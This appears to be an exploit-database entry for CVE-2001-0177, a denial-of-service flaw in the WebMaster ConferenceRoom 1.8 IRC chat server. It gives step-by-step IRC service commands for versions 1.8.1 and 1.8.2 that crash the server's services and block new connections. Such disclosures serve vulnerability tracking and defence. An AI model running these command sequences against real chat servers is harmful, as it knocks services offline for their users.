WebMaster ConferenceRoom 1.8 Developer Edition - Denial of Service

Author: Murat - 2
type: dos
platform: multiple
port: nan
date_added: 2001-01-10 
date_updated: 2012-08-14 
verified: 1 
codes: CVE-2001-0177;OSVDB-13801 
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/2178/info

WebMaster ConferenceRoom Developer Edition is a chat package which enables a large community of users to chat together. ConferenceRoom has a wide range of capabilities and a user friendly channel moderation feature.

It is possible to cause a denial of service in ConferenceRoom. By making duplicate connections and executing special server commands in both sessions, ConferenceRoom will crash and refuse any new connections. A restart of the service is required in order to gain normal functionality.

ConferenceRoom 1.8.1:

Make to connections to the irc server second being the clone of other. On second connection (clone) type "/ns buddy on". on first connection type "/ns buddy add <clone client nickname>". on clone type "/ns auth accept 1" and the services crashes.

ConferenceRoom 1.8.2:

"/ns buddy on" can't run, cuz professional edt. can't support "buddy" command. Register it one channel, and type it commands "/ns set authorize chanlists on", "/cs aop <#ChannelName> add <NickName>", "/ns auth accept 1". and the services crashes.